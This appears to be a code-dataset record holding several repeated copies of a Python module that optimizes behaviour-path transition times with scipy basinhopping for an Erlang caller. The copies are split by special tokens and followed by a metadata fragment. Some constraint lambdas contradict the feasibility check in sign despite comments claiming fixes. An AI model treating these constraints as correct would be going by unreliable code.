        edge = path[i], path[i + 1]
        tau = BTG[edge]
        # Accumulate only the shortfall when the dwell time is below tau.
        S += min(0, t[i + 1] - t[i] - tau)
    return S
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class Bounds(object):
    """Feasibility test for scipy.optimize.basinhopping's ``accept_test``.

    A vector ``x`` of transition times is feasible when every component
    lies in ``[xmin, xmax]``, consecutive times are separated by at least
    the corresponding transition cost, and ``x[0] <= costs[0]``.
    """

    def __init__(self, xmin, xmax, costs):
        # xmin/xmax are scalar box bounds applied component-wise;
        # costs[i] is the minimum spacing required before time i.
        self.xmax = xmax
        self.xmin = xmin
        self.costs = costs

    def is_valid(self, x):
        """Return True when ``x`` satisfies the box and ordering constraints."""
        below_max = bool(np.all(x <= self.xmax))
        above_min = bool(np.all(x >= self.xmin))
        in_order = [(x[i] + c <= x[i + 1]) for i, c in enumerate(self.costs
            [1:])]
        in_order.append(x[0] <= self.costs[0])
        return below_max and above_min and all(in_order)

    def __call__(self, **kwargs):
        # basinhopping's accept_test protocol supplies the candidate as x_new.
        x = kwargs['x_new']
        return self.is_valid(x)

    def SLSQP_constraints(self):
        """Return inequality constraints for SLSQP,
        in particular, assert that 0 >= x_i - x_i-1 forall i.

        Bug fix: the original lambdas closed over the loop variables ``i``
        and ``c`` late, so every constraint saw the final loop values (and
        the trailing ``lambda x: -x[i]`` referenced a leaked loop variable,
        a NameError on Python 3).  Loop variables are now bound eagerly via
        default arguments, and the trailing lambda is replaced by one
        upper-bound constraint per component.
        """
        funs = [(lambda x, i=i, c=c: x[i + 1] - x[i] + c)
                for i, c in enumerate(self.costs[1:])]
        funs.append(lambda x: x[0] + self.costs[0])
        n = len(self.costs)
        # Per-component lower bounds (x_i >= 0, matching the original) and
        # upper bounds (x_i <= xmax); presumably xmin is 0 here -- TODO
        # confirm against callers, which construct Bounds(0.0, ...).
        funs += [(lambda x, i=i: x[i]) for i in range(n)]
        funs += [(lambda x, i=i: self.xmax - x[i]) for i in range(n)]
        # Matrix form b - A.x >= 0 for SLSQP: -I rows encode lower bounds,
        # I rows encode upper bounds, and the rolled [1, -1] rows encode
        # the consecutive-time spacing constraints.
        neg = np.identity(n) * -1
        rhs1 = np.ones(n) * self.xmin
        rhs1[0] += self.costs[0]
        tmax = np.identity(n)
        rhs2 = np.ones(n) * self.xmax
        A = np.vstack((neg, tmax))
        b = np.hstack((rhs1, rhs2))
        if n >= 2:
            root = [1, -1] + [0] * (n - 2)
            z = np.vstack([np.roll(root, i) for i in range(n - 1)])
            rhs3 = np.array(self.costs[1:])
            A = np.vstack((A, z))
            b = np.hstack((b, rhs3))
        return {'slsqp': {'type': 'ineq', 'fun': lambda x: b - np.dot(A, x)
            }, 'cobyla': [{'type': 'ineq', 'fun': f} for f in funs]}

    def SLSQP_bounds(self):
        """Return the box bounds as a per-component sequence of pairs."""
        return [(self.xmin, self.xmax) for _ in range(len(self.costs))]
class Stepper(object):
    """Custom basinhopping ``take_step`` that only proposes feasible moves.

    Each call draws a uniform random displacement whose radius shrinks
    geometrically (factor ``deflate``) on every attempt; the first
    candidate accepted by ``bounds`` is taken.  If no attempt succeeds
    within ``max_iter`` tries the point is returned unchanged.
    """

    def __init__(self, bounds, stepsize=10, max_iter=20, deflate=0.5):
        self.bounds = bounds
        self.stepsize = stepsize
        self.max_iter = max_iter
        self.deflate = deflate

    def __call__(self, x):
        # Fix: dropped the unused ``y = None`` local; range for Py3 compat.
        for attempt in range(self.max_iter):
            radius = self.stepsize * self.deflate ** (attempt + 1)
            u = np.random.uniform(-radius, radius, x.shape)
            if self.bounds.is_valid(x + u):
                x += u  # NOTE: mutates the caller's array in place.
                return x
        return x
def optimize_path(paths, behaviours, btg, start, prediction, dt, maxiter):
    """Erlang entry point: parse erlport terms, run the path optimization,
    and return (path, absolute transition times offset by `start`).

    Fixes vs. original: `maxiter` was accepted but silently ignored (a
    literal 10 was passed through); result times are built with a
    comprehension so a concrete list is returned on Python 3 as well.
    """
    B_table = parse_behaviours(behaviours)
    BTG = parse_edgelist(btg)
    F = parse_prediction(prediction)
    path, t = best_path(paths, B_table, BTG, F, dt=dt, maxiter=maxiter)
    return list(path), [int(x) + start for x in t.x]
def best_path(paths, Behaviour_Table, BTG, F, dt=1.0, maxiter=20, Acc0=None,
              method='SLSQP'):
    """Pick the candidate path (and its transition times) with the lowest
    objective: one basinhopping run per path, return the best result.

    :paths -> iterable of path-iterables (behaviour_id sequences)
    :Behaviour_Table -> {behaviour_id: <behaviour_vec>}; must cover the BTG
    :BTG -> behaviour transition graph as {(v_1, v_2): tau_1,2}
    :F -> prediction matrix of shape (|b_vec|, n), n = int(T_max / dt)
    :dt -> prediction time-resolution
    :Acc0 -> initial queue accumulator; defaults to zeros
    Returns (best_path, scipy OptimizeResult).
    """
    if Acc0 is None:
        Acc0 = np.zeros(F.shape[0])
    t_max = int((F.shape[-1] - 1) * dt)
    initial_T = F.sum() / len(paths[0])  # passed as basinhopping's T
    Solutions = []
    for path in paths:
        L, x0, bounds, step_taker = opt_params(path, Behaviour_Table, BTG,
                                               t_max, F, dt=dt, Acc0=Acc0)
        minimizer_kwargs = {
            'method': method,
            'bounds': bounds.SLSQP_bounds(),
            'constraints': bounds.SLSQP_constraints()[method.lower()],
        }
        Solutions.append(
            basinhopping(L, x0.copy(), accept_test=bounds,
                         take_step=step_taker, stepsize=10 * dt,
                         niter=maxiter, T=initial_T, interval=20,
                         minimizer_kwargs=minimizer_kwargs))
    best_i, best = min(enumerate(Solutions), key=lambda pair: pair[1].fun)
    return paths[best_i], best
def opt_params(path, BTable, BTG, t_max, F, dt, Acc0,
               q_acc_model=qsim.integrator, q_acc_model_args=[],
               q_model_kwargs={}, q_relief_model=qsim.linear_relief,
               deadtime_penalty=4):
    '''Build the pieces that specify one best-path optimization run.

    Returns:
    :cost -> objective L(x): negative served flow plus dead-time and
             queue-accumulator penalty terms (minimized by basinhopping)
    :x0 -> an initial realizeable solution
    :bounds -> Bounds() object delimiting the feasible hyper-volume for x
    :step_taker -> Stepper() proposing in-bounds random moves

    NOTE(review): q_acc_model / q_acc_model_args / q_model_kwargs /
    q_relief_model are currently unused (and the list/dict defaults are
    shared mutables); kept unchanged for interface compatibility.
    '''
    # Pass a list, not a generator: np.vstack on a generator expression is
    # an error on modern NumPy releases.
    B = np.vstack([BTable[bid] for bid in path])  # Behaviour Matrix (d, 4)
    taus = transition_costs(path, BTG)
    x0 = initial_soln(path, t_max)
    bounds = Bounds(0.0, (F.shape[-1] - 1) * dt, taus)

    def cost(x, p=deadtime_penalty):
        '''Simulate the queue effects, then score the simulated flow.'''
        k = F.shape[1] if F.shape[1] > 0 else 1
        avg_rates = F.sum(1) / k
        Z, Acc = qsim.cascading_relief(F, path, x, costs=taus, BTable=BTable,
                                       Acc0=Acc0,
                                       relief_mode_kwargs={"rate": 0.5})
        cum_Z = np.cumsum(Z, axis=1)
        Deadtimes = np.where(Z == 0, 0, 1).sum(1)
        return (-obj(x, B, cum_Z, taus, dt=dt)
                + 0.25 * avg_rates.dot(Deadtimes) ** 2
                - avg_rates.sum() * Acc.sum())

    step_taker = Stepper(bounds, 10, 20)
    return cost, x0, bounds, step_taker
def parse_edgelist(edges):
    '''Convert an edge list [((a, b), tau)] into a lookup {(a, b): tau}.'''
    table = {}
    for (a, b), tau in edges:
        table[(a, b)] = tau
    return table
def parse_behaviours(behaviours, dtype=np.float32):
    '''[(bid, [bvec])] -> {bid: <bvec>}: rows summed along axis 1.

    NOTE(review): `dtype` is accepted but currently unused.
    '''
    table = {}
    for bid, bvec in behaviours:
        table[bid] = np.array(bvec).sum(1)
    return table
def parse_prediction(F):
    '''Materialize a nested [[float]] prediction as an ndarray (same shape).'''
    prediction = np.array(F)
    return prediction
def initial_soln(path, t_max):
    '''Evenly distributed initial transition times (no tau feasibility check).

    Floor division (//) preserves the original Python 2 integer-division
    behaviour when run on Python 3; range() replaces xrange().
    '''
    j = t_max // len(path)
    return np.array([(i + 1) * j for i in range(len(path) - 1)])
def transition_costs(path, btg):
    '''Transition cost tau for each consecutive edge along `path`.
    (range() replaces xrange() for Python 3 compatibility.)'''
    return [btg[(path[i], path[i + 1])] for i in range(len(path) - 1)]
def range_sum(cum_F, a, b, penalty=-1000):
    '''Cumulative-sum difference cum_F[..., b] - cum_F[..., a]; returns a
    penalty vector that brutally dominates the objective whenever either
    index falls outside the last axis.'''
    last = cum_F.shape[-1] - 1
    in_range = (0 <= a <= last) and (0 <= b <= last)
    if in_range:
        return cum_F[..., b] - cum_F[..., a]
    return np.ones(cum_F.shape[0]) * penalty
def flow_served(cum_F, times, costs, queue_model=None, dt=1.0):
    '''Times: [t1, ..., td], costs: [t_{b0,b1}, t_{b1,b2}, ...].
    Returns the fulfillment matrix for the behaviour segments: row i is the
    flow served between transition i (shifted by its cost) and transition
    i+1, computed via range_sum on the cumulative prediction cum_F.

    Uses list comprehensions instead of map() so the `[0] + ...`
    concatenations also work on Python 3 (identical result on Python 2).
    NOTE(review): `queue_model` is accepted but unused here.
    '''
    discr_index = lambda x: int(x / dt) - 1
    t_steps = [0] + [discr_index(t) for t in times]
    t_steps.append(cum_F.shape[-1] - 1)  # final segment ends at t_max
    c_steps = [0] + [discr_index(c) for c in costs]
    return np.vstack([range_sum(cum_F, t_steps[i] + c_steps[i], t_steps[i + 1])
                      for i in range(len(costs) + 1)])
def obj(times, B, cum_F, costs, dt=1.0):
    '''Hillclimbing objective: total behaviour-weighted flow served.'''
    served = flow_served(cum_F, times, costs, dt=dt)
    return (B * served).sum()
def barrier(times, path, BTG):
    """Causality penalty for transition times along a path.

    For each edge (path[i], path[i+1]) with cost tau, accrues the (negative)
    amount by which the transition fires before tau has elapsed since the
    previous one; returns 0.0 when every constraint holds.
    Uses range() instead of xrange() so it also runs on Python 3 (identical
    behaviour on Python 2).
    """
    t = [0] + list(times)
    S = 0.0
    for i in range(len(path) - 1):
        tau = BTG[(path[i], path[i + 1])]
        S += min(0, t[i + 1] - t[i] - tau)  # only accrues when violated
    return S
<|reserved_special_token_1|>
from erlport.erlterms import Atom
from scipy.optimize import basinhopping
import numpy as np
import qsim
class Bounds(object):
    """Acceptance test and constraint factory for scipy.optimize.basinhopping.

    A candidate x (vector of transition times) is feasible when every
    component lies in [xmin, xmax], x[0] <= costs[0], and each successive
    pair respects its transition cost: x[i] + costs[i+1] <= x[i+1].
    """

    def __init__(self, xmin, xmax, costs):
        self.xmax = xmax        # upper bound for every coordinate
        self.xmin = xmin        # lower bound for every coordinate
        self.costs = costs      # per-transition time costs (taus)

    def is_valid(self, x):
        """True when x lies in the box and respects the transition costs."""
        tmax = bool(np.all(x <= self.xmax))
        tmin = bool(np.all(x >= self.xmin))
        in_order = [x[i] + c <= x[i + 1] for i, c in enumerate(self.costs[1:])]
        in_order.append(x[0] <= self.costs[0])
        return tmax and tmin and all(in_order)

    def __call__(self, **kwargs):
        # basinhopping accept_test protocol: candidate arrives as x_new.
        return self.is_valid(kwargs['x_new'])

    def SLSQP_constraints(self):
        """Return inequality constraints (fun(x) >= 0 form) for SLSQP/COBYLA.

        Bug fixes vs. the original:
        * lambdas now bind i and c as default arguments; previously they
          closed over the loop variables late, so every constraint
          evaluated with the final i/c values;
        * the stray trailing `lambda x: -x[i]` (which relied on the leaked
          loop variable and pinned only the last coordinate to <= 0) is
          replaced by proper xmax upper bounds, mirroring the matrix form
          built below for SLSQP.
        """
        n = len(self.costs)
        # Successive-transition constraints: x[i+1] - x[i] + costs[i+1] >= 0.
        funs = [lambda x, i=i, c=c: x[i + 1] - x[i] + c
                for i, c in enumerate(self.costs[1:])]
        funs.append(lambda x: x[0] + self.costs[0])
        funs += [lambda x, i=i: x[i] for i in range(n)]              # x_i >= 0
        funs += [lambda x, i=i: self.xmax - x[i] for i in range(n)]  # x_i <= xmax
        # Matrix form b - A.x >= 0 for SLSQP.
        neg = np.identity(n) * -1
        rhs1 = np.ones(n) * self.xmin
        rhs1[0] += self.costs[0]
        tmax = np.identity(n)
        rhs2 = np.ones(n) * self.xmax
        A = np.vstack((neg, tmax))
        b = np.hstack((rhs1, rhs2))
        if n >= 2:
            root = [1, -1] + [0] * (n - 2)
            z = np.vstack([np.roll(root, i) for i in range(n - 1)])
            rhs3 = np.array(self.costs[1:])
            A = np.vstack((A, z))
            b = np.hstack((b, rhs3))
        return {'slsqp': {'type': 'ineq', 'fun': lambda x: b - np.dot(A, x)},
                'cobyla': [{'type': 'ineq', 'fun': f} for f in funs]}

    def SLSQP_bounds(self):
        """Per-coordinate (min, max) bounds as a sequence."""
        return [(self.xmin, self.xmax) for _ in range(len(self.costs))]
class Stepper(object):
    """Custom basinhopping take_step: random move that respects bounds.

    Tries progressively smaller uniform perturbations (radius shrinks by
    `deflate` each attempt) and applies the first in-bounds candidate,
    mutating and returning x; gives up after max_iter attempts and returns
    x unchanged. (Removed the dead local `y`; range() for Py2/Py3.)
    """

    def __init__(self, bounds, stepsize=10, max_iter=20, deflate=0.5):
        self.bounds = bounds        # Bounds-like object with is_valid(x)
        self.stepsize = stepsize    # initial perturbation radius
        self.max_iter = max_iter    # attempts before giving up
        self.deflate = deflate      # radius shrink factor per attempt

    def __call__(self, x):
        for i in range(self.max_iter):
            r = self.stepsize * self.deflate ** (i + 1)
            u = np.random.uniform(-r, r, x.shape)
            if self.bounds.is_valid(x + u):
                x += u
                return x
        return x
def optimize_path(paths, behaviours, btg, start, prediction, dt, maxiter):
    """Erlang entry point: parse erlport terms, run the path optimization,
    and return (path, absolute transition times offset by `start`).

    Fixes vs. original: `maxiter` was accepted but silently ignored (a
    literal 10 was passed through); result times are built with a
    comprehension so a concrete list is returned on Python 3 as well.
    """
    B_table = parse_behaviours(behaviours)
    BTG = parse_edgelist(btg)
    F = parse_prediction(prediction)
    path, t = best_path(paths, B_table, BTG, F, dt=dt, maxiter=maxiter)
    return list(path), [int(x) + start for x in t.x]
def best_path(paths, Behaviour_Table, BTG, F, dt=1.0, maxiter=20, Acc0=None,
              method='SLSQP'):
    """Pick the candidate path (and its transition times) with the lowest
    objective: one basinhopping run per path, return the best result.

    :paths -> iterable of path-iterables (behaviour_id sequences)
    :Behaviour_Table -> {behaviour_id: <behaviour_vec>}; must cover the BTG
    :BTG -> behaviour transition graph as {(v_1, v_2): tau_1,2}
    :F -> prediction matrix of shape (|b_vec|, n), n = int(T_max / dt)
    :dt -> prediction time-resolution
    :Acc0 -> initial queue accumulator; defaults to zeros
    Returns (best_path, scipy OptimizeResult).
    """
    if Acc0 is None:
        Acc0 = np.zeros(F.shape[0])
    t_max = int((F.shape[-1] - 1) * dt)
    initial_T = F.sum() / len(paths[0])  # passed as basinhopping's T
    Solutions = []
    for path in paths:
        L, x0, bounds, step_taker = opt_params(path, Behaviour_Table, BTG,
                                               t_max, F, dt=dt, Acc0=Acc0)
        minimizer_kwargs = {
            'method': method,
            'bounds': bounds.SLSQP_bounds(),
            'constraints': bounds.SLSQP_constraints()[method.lower()],
        }
        Solutions.append(
            basinhopping(L, x0.copy(), accept_test=bounds,
                         take_step=step_taker, stepsize=10 * dt,
                         niter=maxiter, T=initial_T, interval=20,
                         minimizer_kwargs=minimizer_kwargs))
    best_i, best = min(enumerate(Solutions), key=lambda pair: pair[1].fun)
    return paths[best_i], best
def opt_params(path, BTable, BTG, t_max, F, dt, Acc0,
               q_acc_model=qsim.integrator, q_acc_model_args=[],
               q_model_kwargs={}, q_relief_model=qsim.linear_relief,
               deadtime_penalty=4):
    '''Build the pieces that specify one best-path optimization run.

    Returns:
    :cost -> objective L(x): negative served flow plus dead-time and
             queue-accumulator penalty terms (minimized by basinhopping)
    :x0 -> an initial realizeable solution
    :bounds -> Bounds() object delimiting the feasible hyper-volume for x
    :step_taker -> Stepper() proposing in-bounds random moves

    NOTE(review): q_acc_model / q_acc_model_args / q_model_kwargs /
    q_relief_model are currently unused (and the list/dict defaults are
    shared mutables); kept unchanged for interface compatibility.
    '''
    # Pass a list, not a generator: np.vstack on a generator expression is
    # an error on modern NumPy releases.
    B = np.vstack([BTable[bid] for bid in path])  # Behaviour Matrix (d, 4)
    taus = transition_costs(path, BTG)
    x0 = initial_soln(path, t_max)
    bounds = Bounds(0.0, (F.shape[-1] - 1) * dt, taus)

    def cost(x, p=deadtime_penalty):
        '''Simulate the queue effects, then score the simulated flow.'''
        k = F.shape[1] if F.shape[1] > 0 else 1
        avg_rates = F.sum(1) / k
        Z, Acc = qsim.cascading_relief(F, path, x, costs=taus, BTable=BTable,
                                       Acc0=Acc0,
                                       relief_mode_kwargs={"rate": 0.5})
        cum_Z = np.cumsum(Z, axis=1)
        Deadtimes = np.where(Z == 0, 0, 1).sum(1)
        return (-obj(x, B, cum_Z, taus, dt=dt)
                + 0.25 * avg_rates.dot(Deadtimes) ** 2
                - avg_rates.sum() * Acc.sum())

    step_taker = Stepper(bounds, 10, 20)
    return cost, x0, bounds, step_taker
def parse_edgelist(edges):
    '''Convert an edge list [((a, b), tau)] into a lookup {(a, b): tau}.'''
    table = {}
    for (a, b), tau in edges:
        table[(a, b)] = tau
    return table
def parse_behaviours(behaviours, dtype=np.float32):
    '''[(bid, [bvec])] -> {bid: <bvec>}: rows summed along axis 1.

    NOTE(review): `dtype` is accepted but currently unused.
    '''
    table = {}
    for bid, bvec in behaviours:
        table[bid] = np.array(bvec).sum(1)
    return table
def parse_prediction(F):
    '''Materialize a nested [[float]] prediction as an ndarray (same shape).'''
    prediction = np.array(F)
    return prediction
def initial_soln(path, t_max):
    '''Evenly distributed initial transition times (no tau feasibility check).

    Floor division (//) preserves the original Python 2 integer-division
    behaviour when run on Python 3; range() replaces xrange().
    '''
    j = t_max // len(path)
    return np.array([(i + 1) * j for i in range(len(path) - 1)])
def transition_costs(path, btg):
    '''Transition cost tau for each consecutive edge along `path`.
    (range() replaces xrange() for Python 3 compatibility.)'''
    return [btg[(path[i], path[i + 1])] for i in range(len(path) - 1)]
def range_sum(cum_F, a, b, penalty=-1000):
    '''Cumulative-sum difference cum_F[..., b] - cum_F[..., a]; returns a
    penalty vector that brutally dominates the objective whenever either
    index falls outside the last axis.'''
    last = cum_F.shape[-1] - 1
    in_range = (0 <= a <= last) and (0 <= b <= last)
    if in_range:
        return cum_F[..., b] - cum_F[..., a]
    return np.ones(cum_F.shape[0]) * penalty
def flow_served(cum_F, times, costs, queue_model=None, dt=1.0):
    '''Times: [t1, ..., td], costs: [t_{b0,b1}, t_{b1,b2}, ...].
    Returns the fulfillment matrix for the behaviour segments: row i is the
    flow served between transition i (shifted by its cost) and transition
    i+1, computed via range_sum on the cumulative prediction cum_F.

    Uses list comprehensions instead of map() so the `[0] + ...`
    concatenations also work on Python 3 (identical result on Python 2).
    NOTE(review): `queue_model` is accepted but unused here.
    '''
    discr_index = lambda x: int(x / dt) - 1
    t_steps = [0] + [discr_index(t) for t in times]
    t_steps.append(cum_F.shape[-1] - 1)  # final segment ends at t_max
    c_steps = [0] + [discr_index(c) for c in costs]
    return np.vstack([range_sum(cum_F, t_steps[i] + c_steps[i], t_steps[i + 1])
                      for i in range(len(costs) + 1)])
def obj(times, B, cum_F, costs, dt=1.0):
    '''Hillclimbing objective: total behaviour-weighted flow served.'''
    served = flow_served(cum_F, times, costs, dt=dt)
    return (B * served).sum()
def barrier(times, path, BTG):
    """Causality penalty for transition times along a path.

    For each edge (path[i], path[i+1]) with cost tau, accrues the (negative)
    amount by which the transition fires before tau has elapsed since the
    previous one; returns 0.0 when every constraint holds.
    Uses range() instead of xrange() so it also runs on Python 3 (identical
    behaviour on Python 2).
    """
    t = [0] + list(times)
    S = 0.0
    for i in range(len(path) - 1):
        tau = BTG[(path[i], path[i + 1])]
        S += min(0, t[i + 1] - t[i] - tau)  # only accrues when violated
    return S
<|reserved_special_token_1|>
from erlport.erlterms import Atom
from scipy.optimize import basinhopping
import numpy as np
import qsim
class Bounds(object):
    """Acceptance test and constraint factory for scipy.optimize.basinhopping.

    A candidate x (vector of transition times) is feasible when every
    component lies in [xmin, xmax], x[0] <= costs[0], and each successive
    pair respects its transition cost: x[i] + costs[i+1] <= x[i+1].
    """

    def __init__(self, xmin, xmax, costs):
        self.xmax = xmax        # upper bound for every coordinate
        self.xmin = xmin        # lower bound for every coordinate
        self.costs = costs      # per-transition time costs (taus)

    def is_valid(self, x):
        """True when x lies in the box and respects the transition costs."""
        tmax = bool(np.all(x <= self.xmax))
        tmin = bool(np.all(x >= self.xmin))
        in_order = [x[i] + c <= x[i + 1] for i, c in enumerate(self.costs[1:])]
        in_order.append(x[0] <= self.costs[0])
        return tmax and tmin and all(in_order)

    def __call__(self, **kwargs):
        # basinhopping accept_test protocol: candidate arrives as x_new.
        return self.is_valid(kwargs['x_new'])

    def SLSQP_constraints(self):
        """Return inequality constraints (fun(x) >= 0 form) for SLSQP/COBYLA.

        Bug fixes vs. the original:
        * lambdas now bind i and c as default arguments; previously they
          closed over the loop variables late, so every constraint
          evaluated with the final i/c values;
        * the stray trailing `lambda x: -x[i]` (which relied on the leaked
          loop variable and pinned only the last coordinate to <= 0) is
          replaced by proper xmax upper bounds, mirroring the matrix form
          built below for SLSQP.
        """
        n = len(self.costs)
        # Successive-transition constraints: x[i+1] - x[i] + costs[i+1] >= 0.
        funs = [lambda x, i=i, c=c: x[i + 1] - x[i] + c
                for i, c in enumerate(self.costs[1:])]
        funs.append(lambda x: x[0] + self.costs[0])
        funs += [lambda x, i=i: x[i] for i in range(n)]              # x_i >= 0
        funs += [lambda x, i=i: self.xmax - x[i] for i in range(n)]  # x_i <= xmax
        # Matrix form b - A.x >= 0 for SLSQP.
        neg = np.identity(n) * -1
        rhs1 = np.ones(n) * self.xmin
        rhs1[0] += self.costs[0]
        tmax = np.identity(n)
        rhs2 = np.ones(n) * self.xmax
        A = np.vstack((neg, tmax))
        b = np.hstack((rhs1, rhs2))
        if n >= 2:
            root = [1, -1] + [0] * (n - 2)
            z = np.vstack([np.roll(root, i) for i in range(n - 1)])
            rhs3 = np.array(self.costs[1:])
            A = np.vstack((A, z))
            b = np.hstack((b, rhs3))
        return {'slsqp': {'type': 'ineq', 'fun': lambda x: b - np.dot(A, x)},
                'cobyla': [{'type': 'ineq', 'fun': f} for f in funs]}

    def SLSQP_bounds(self):
        """Per-coordinate (min, max) bounds as a sequence."""
        return [(self.xmin, self.xmax) for _ in range(len(self.costs))]
class Stepper(object):
    """Custom basinhopping take_step: random move that respects bounds.

    Tries progressively smaller uniform perturbations (radius shrinks by
    `deflate` each attempt) and applies the first in-bounds candidate,
    mutating and returning x; gives up after max_iter attempts and returns
    x unchanged. (Removed the dead local `y`; range() for Py2/Py3.)
    """

    def __init__(self, bounds, stepsize=10, max_iter=20, deflate=0.5):
        self.bounds = bounds        # Bounds-like object with is_valid(x)
        self.stepsize = stepsize    # initial perturbation radius
        self.max_iter = max_iter    # attempts before giving up
        self.deflate = deflate      # radius shrink factor per attempt

    def __call__(self, x):
        for i in range(self.max_iter):
            r = self.stepsize * self.deflate ** (i + 1)
            u = np.random.uniform(-r, r, x.shape)
            if self.bounds.is_valid(x + u):
                x += u
                return x
        return x
def optimize_path(paths, behaviours, btg, start, prediction, dt, maxiter):
    """Erlang entry point: parse erlport terms, run the path optimization,
    and return (path, absolute transition times offset by `start`).

    Fixes vs. original: `maxiter` was accepted but silently ignored (a
    literal 10 was passed through); result times are built with a
    comprehension so a concrete list is returned on Python 3 as well.
    """
    B_table = parse_behaviours(behaviours)
    BTG = parse_edgelist(btg)
    F = parse_prediction(prediction)
    path, t = best_path(paths, B_table, BTG, F, dt=dt, maxiter=maxiter)
    return list(path), [int(x) + start for x in t.x]
def best_path(paths, Behaviour_Table, BTG, F, dt=1.0, maxiter=20, Acc0=None,
              method='SLSQP'):
    """Pick the candidate path (and its transition times) with the lowest
    objective: one basinhopping run per path, return the best result.

    :paths -> iterable of path-iterables (behaviour_id sequences)
    :Behaviour_Table -> {behaviour_id: <behaviour_vec>}; must cover the BTG
    :BTG -> behaviour transition graph as {(v_1, v_2): tau_1,2}
    :F -> prediction matrix of shape (|b_vec|, n), n = int(T_max / dt)
    :dt -> prediction time-resolution
    :Acc0 -> initial queue accumulator; defaults to zeros
    Returns (best_path, scipy OptimizeResult).
    """
    if Acc0 is None:
        Acc0 = np.zeros(F.shape[0])
    t_max = int((F.shape[-1] - 1) * dt)
    initial_T = F.sum() / len(paths[0])  # passed as basinhopping's T
    Solutions = []
    for path in paths:
        L, x0, bounds, step_taker = opt_params(path, Behaviour_Table, BTG,
                                               t_max, F, dt=dt, Acc0=Acc0)
        minimizer_kwargs = {
            'method': method,
            'bounds': bounds.SLSQP_bounds(),
            'constraints': bounds.SLSQP_constraints()[method.lower()],
        }
        Solutions.append(
            basinhopping(L, x0.copy(), accept_test=bounds,
                         take_step=step_taker, stepsize=10 * dt,
                         niter=maxiter, T=initial_T, interval=20,
                         minimizer_kwargs=minimizer_kwargs))
    best_i, best = min(enumerate(Solutions), key=lambda pair: pair[1].fun)
    return paths[best_i], best
def opt_params(path, BTable, BTG, t_max, F, dt, Acc0,
               q_acc_model=qsim.integrator, q_acc_model_args=[],
               q_model_kwargs={}, q_relief_model=qsim.linear_relief,
               deadtime_penalty=4):
    '''Build the pieces that specify one best-path optimization run.

    Returns:
    :cost -> objective L(x): negative served flow plus dead-time and
             queue-accumulator penalty terms (minimized by basinhopping)
    :x0 -> an initial realizeable solution
    :bounds -> Bounds() object delimiting the feasible hyper-volume for x
    :step_taker -> Stepper() proposing in-bounds random moves

    NOTE(review): q_acc_model / q_acc_model_args / q_model_kwargs /
    q_relief_model are currently unused (and the list/dict defaults are
    shared mutables); kept unchanged for interface compatibility.
    '''
    # Pass a list, not a generator: np.vstack on a generator expression is
    # an error on modern NumPy releases.
    B = np.vstack([BTable[bid] for bid in path])  # Behaviour Matrix (d, 4)
    taus = transition_costs(path, BTG)
    x0 = initial_soln(path, t_max)
    bounds = Bounds(0.0, (F.shape[-1] - 1) * dt, taus)

    def cost(x, p=deadtime_penalty):
        '''Simulate the queue effects, then score the simulated flow.'''
        k = F.shape[1] if F.shape[1] > 0 else 1
        avg_rates = F.sum(1) / k
        Z, Acc = qsim.cascading_relief(F, path, x, costs=taus, BTable=BTable,
                                       Acc0=Acc0,
                                       relief_mode_kwargs={"rate": 0.5})
        cum_Z = np.cumsum(Z, axis=1)
        Deadtimes = np.where(Z == 0, 0, 1).sum(1)
        return (-obj(x, B, cum_Z, taus, dt=dt)
                + 0.25 * avg_rates.dot(Deadtimes) ** 2
                - avg_rates.sum() * Acc.sum())

    step_taker = Stepper(bounds, 10, 20)
    return cost, x0, bounds, step_taker
# Parsers ###############################################################
def parse_edgelist(edges):
    '''Convert an edge list [((a, b), tau)] into a lookup {(a, b): tau}.'''
    table = {}
    for (a, b), tau in edges:
        table[(a, b)] = tau
    return table
def parse_behaviours(behaviours, dtype=np.float32):
    '''[(bid, [bvec])] -> {bid: <bvec>}: rows summed along axis 1.

    NOTE(review): `dtype` is accepted but currently unused.
    '''
    table = {}
    for bid, bvec in behaviours:
        table[bid] = np.array(bvec).sum(1)
    return table
def parse_prediction(F):
    '''Materialize a nested [[float]] prediction as an ndarray (same shape).'''
    prediction = np.array(F)
    return prediction
# Optimization ###############################################################
def initial_soln(path, t_max):
    '''Evenly distributed initial transition times (no tau feasibility check).

    Floor division (//) preserves the original Python 2 integer-division
    behaviour when run on Python 3; range() replaces xrange().
    '''
    j = t_max // len(path)
    return np.array([(i + 1) * j for i in range(len(path) - 1)])
def transition_costs(path, btg):
    '''Transition cost tau for each consecutive edge along `path`.
    (range() replaces xrange() for Python 3 compatibility.)'''
    return [btg[(path[i], path[i + 1])] for i in range(len(path) - 1)]
def range_sum(cum_F, a, b, penalty=-1000):
    '''Cumulative-sum difference cum_F[..., b] - cum_F[..., a]; returns a
    penalty vector that brutally dominates the objective whenever either
    index falls outside the last axis.'''
    last = cum_F.shape[-1] - 1
    in_range = (0 <= a <= last) and (0 <= b <= last)
    if in_range:
        return cum_F[..., b] - cum_F[..., a]
    return np.ones(cum_F.shape[0]) * penalty
def flow_served(cum_F, times, costs, queue_model=None, dt=1.0):
    '''Times: [t1, ..., td], costs: [t_{b0,b1}, t_{b1,b2}, ...].
    Returns the fulfillment matrix for the behaviour segments: row i is the
    flow served between transition i (shifted by its cost) and transition
    i+1, computed via range_sum on the cumulative prediction cum_F.

    Uses list comprehensions instead of map() so the `[0] + ...`
    concatenations also work on Python 3 (identical result on Python 2).
    NOTE(review): `queue_model` is accepted but unused here.
    '''
    discr_index = lambda x: int(x / dt) - 1
    t_steps = [0] + [discr_index(t) for t in times]
    t_steps.append(cum_F.shape[-1] - 1)  # final segment ends at t_max
    c_steps = [0] + [discr_index(c) for c in costs]
    return np.vstack([range_sum(cum_F, t_steps[i] + c_steps[i], t_steps[i + 1])
                      for i in range(len(costs) + 1)])
def obj(times, B, cum_F, costs, dt=1.):
    '''Hillclimbing objective: total behaviour-weighted flow served.'''
    served = flow_served(cum_F, times, costs, dt=dt)
    return (B * served).sum()
def barrier(times, path, BTG):
    """Handle linear/causality constraints with respect to transitions.

    Returns the accumulated (non-positive) slack: for each consecutive edge,
    a term is accrued only when the transition time violates its tau, so a
    fully feasible schedule returns 0.0.
    """
    t = [0] + list(times)
    total = 0.
    # `range` instead of the Python-2-only `xrange` for Python 3 compatibility.
    for i in range(len(path) - 1):
        tau = BTG[(path[i], path[i + 1])]
        # Only accrue if the constraint is violated (slack is negative).
        total += min(0, t[i + 1] - t[i] - tau)
    return total
|
flexible
|
{
"blob_id": "0f4bdaecef356e01cbef527d4886564d9ef840fa",
"index": 5573,
